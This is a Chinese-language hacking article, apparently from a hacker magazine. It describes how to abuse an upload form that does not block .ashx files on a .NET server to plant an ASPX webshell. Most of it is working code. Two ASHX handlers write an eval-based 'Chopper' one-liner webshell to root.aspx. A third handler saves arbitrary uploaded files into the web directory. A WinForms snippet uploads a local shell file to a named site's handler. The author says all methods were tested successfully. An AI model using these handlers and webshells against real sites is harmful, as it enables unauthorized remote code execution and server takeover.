揭穿黑客關(guān)于Ashx腳本寫aspx木馬的方法匯總
作者:佚名
.Net環(huán)境,上傳處未限制Ashx和Asmx,后者上傳無法運行,提示Asmx腳本只能在本地運行,于是打算先傳個Ashx腳本然后在當(dāng)前目錄下生成Aspx文件(目標(biāo)不能執(zhí)行Asp文件)。
.Net環(huán)境,上傳處未限制Ashx和Asmx,后者上傳無法運行,提示Asmx腳本只能在本地運行,于是打算先傳個Ashx腳本然后在當(dāng)前目錄下生成Aspx文件(目標(biāo)不能執(zhí)行Asp文件),網(wǎng)上找到如下Ashx代碼:
- <%@ WebHandler Language="C#" Class="Handler" %>
- using System;
- using System.Web;
- using System.IO;
- public class Handler : IHttpHandler {
- public void ProcessRequest (HttpContext context) {
- context.Response.ContentType = "text/plain";
- StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx"));
- file1.Write("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"pass\"],\"unsafe\");%>");
- file1.Flush();
- file1.Close();
- }
- public bool IsReusable {
- get {
- return false;
- }
- }
- }
我將腳本中的Asp一句話改成菜刀的Aspx一句話~不過執(zhí)行的時候爆錯,說未知指令@Page。遂采用一下2種方式解決:
1,用String連接字符串
- <%@ WebHandler Language="C#" Class="Handler" %>
- using System;
- using System.Web;
- using System.IO;
- public class Handler : IHttpHandler {
- public void ProcessRequest (HttpContext context) {
- context.Response.ContentType = "text/plain";
- string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"chopper\"]"+",\"unsafe\");%>";
- StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx"));
- file1.Write(show);
- file1.Flush();
- file1.Close();
- }
- public bool IsReusable {
- get {
- return false;
- }
- }
- }
2.比較笨的方法,看代碼吧
- <%@ WebHandler Language="C#" Class="Uploader" %>
- using System;
- using System.IO;
- using System.Web;
- public class Uploader : IHttpHandler
- {
- public void ProcessRequest(HttpContext hc)
- {
- foreach (string fileKey in hc.Request.Files)
- {
- HttpPostedFile file = hc.Request.Files[fileKey];
- file.SaveAs(Path.Combine(hc.Server.MapPath("."), file.FileName));
- }
- }
- public bool IsReusable
- {
- get { return true; }
- }
- }
然后用VS建立WinForm程序~主函數(shù)里寫:
System.Net.WebClient myWebClient = new System.Net.WebClient();
myWebClient.UploadFile("http://www.xcnzz.com/Uploader.ashx", "POST", "C:\\ma.aspx");
執(zhí)行就可以了~以上方法均測試成功~
責(zé)任編輯:藍雨淚
來源:
黑客x檔案
